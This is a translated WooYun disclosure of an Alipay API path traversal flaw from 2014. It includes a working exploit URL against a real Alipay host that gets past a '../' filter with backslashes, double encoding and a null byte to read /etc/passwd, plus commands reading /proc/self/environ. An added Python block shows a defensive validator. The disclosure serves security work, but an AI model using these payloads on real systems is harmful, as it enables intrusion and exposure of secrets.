Vulnerability summary

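Bug ID: wooyun-2014-051761

Title: An Alipay vulnerability that was ignored after being fixed can again be used for arbitrary file traversal and download

Vendor: Alipay

Author: 想买一辆车

Submitted: 2014-02-23 02:22

Fixed: 2014-04-09 02:22

Published: 2014-04-09 02:22

Vulnerability type: arbitrary file traversal/download

Severity: High

Self-assessed Rank: 20

Status: confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]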

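Vulnerability details

Disclosure status:

2014-02-23: Details reported to the vendor; awaiting vendor handling
2014-02-25: Vendor confirmed; details disclosed to the vendor only
2014-03-07: Details disclosed to core white hats and experts in related fields
2014-03-17: Details disclosed to regular white hats
2014-03-27: Details disclosed to intern white hats
2014-04-09: Details disclosed to the public

Brief description:

I saw that an Alipay vulnerability on WooYun had been ignored, with the response that the vulnerability did not exist. But what WooYun authors submit is generally real, so I dug into it to see what was going on.

Detailed description:

The vulnerability in the application itself was not fixed; a firewall was used as the fix instead, but it only filters ../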

https://openhome.alipay.com/doc/viewApiDoc.htm?name=alipay.micropay.order.freezepayurl.get&version=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\%252Fetc%252Fpasswd%2500&subVersion=1.0&packageCode=MICROPAY


With that, the traversal sequence can be inserted again.

[Screenshot: zhifubao.png]
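
The filter gap described above, as an added example that is not part of the original report: a check that rejects only a literal `../` next to a validator that canonicalises the value before testing containment. The report does not describe the backend, so it is an assumption here that the value is percent-decoded a second time and that `\` is treated as a separator; `DOC_ROOT` and all function names are hypothetical.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/srv/apidoc"  # hypothetical document root (assumption)
# `version` value shortened from the URL in the report
PAYLOAD = r"..\..\..\%252Fetc%252Fpasswd%2500"

def naive_filter_blocks(raw: str) -> bool:
    """The filter as the report describes it: only a literal '../' is rejected."""
    return "../" in raw

def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until stable, so %252F -> %2F -> / is seen as '/'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")

def safe_doc_path(version: str) -> str:
    """Canonicalise the value first, then require it to stay under DOC_ROOT."""
    v = fully_decode(version)
    if "\x00" in v:
        raise ValueError("NUL byte in path")
    v = v.replace("\\", "/")  # treat both separator styles alike
    candidate = posixpath.normpath(posixpath.join(DOC_ROOT, v))
    if posixpath.commonpath([DOC_ROOT, candidate]) != DOC_ROOT:
        raise ValueError("path escapes document root")
    return candidate

def is_rejected(version: str) -> bool:
    """True when the canonicalising validator refuses the value."""
    try:
        safe_doc_path(version)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    for value in (PAYLOAD, r"..\..\%252Fetc%252Fpasswd", "1.0"):
        print(repr(value), "filter blocks:", naive_filter_blocks(value),
              "validator rejects:", is_rejected(value))
```

The containment check here is purely lexical; on a real filesystem, resolve symlinks (for example with `os.path.realpath`) before comparing against the root.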

Proof of vulnerability:

I wrote a script and looked at a few files. Too tired, going to sleep.

php abc.php '/usr/local/sbin/route.sh'

php abc.php '/proc/self/environ'


I won't look any further.

Remediation:

Copyright notice: when reposting, please credit the source 想买一辆车@WooYun


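Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2014-02-25 08:35

Vendor reply:

Thank you for your attention to Alipay security.

Latest status:

None yet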